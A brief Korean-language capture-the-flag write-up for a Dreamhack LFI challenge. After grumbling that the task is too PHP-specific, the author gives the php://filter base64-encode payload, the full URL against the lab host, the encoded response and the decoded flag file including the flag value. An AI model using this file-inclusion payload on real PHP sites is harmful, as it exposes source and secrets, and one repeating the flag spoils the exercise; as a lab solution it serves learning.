https://dreamhack.io/wargame/challenges/46
LFI 취약점
<aside> <img src="/icons/conversation_red.svg" alt="/icons/conversation_red.svg" width="40px" /> 이건 그냥 php 종속된 문제라 별로임. (누가 php 쓰나) 그냥 뭐 php wrapper 라는거랑 filter 기능 쓰는건데 너무 심할정도로 php 종속적임 시간아깝다
</aside>
아래 값을 page 변수에 넣으면 됨
php://filter/convert.base64-encode/resource=/var/www/uploads/flag
-> <http://host3.dreamhack.games:24232/?page=php://filter/convert.base64-encode/resource=/var/www/uploads/flag>
base64 인코딩된 값
PD9waHAKCSRmbGFnID0gJ0RIe2JiOWRiMWYzMDNjYWNmMGYzYzkxZTBhYmNhMTIyMWZmfSc7Cj8+CmNhbiB5b3Ugc2VlICRmbGFnPw==
디코더 돌리면
<?php
$flag = 'DH{bb9db1f303cacf0f3c91e0abca1221ff}';
?>
can you see $flag?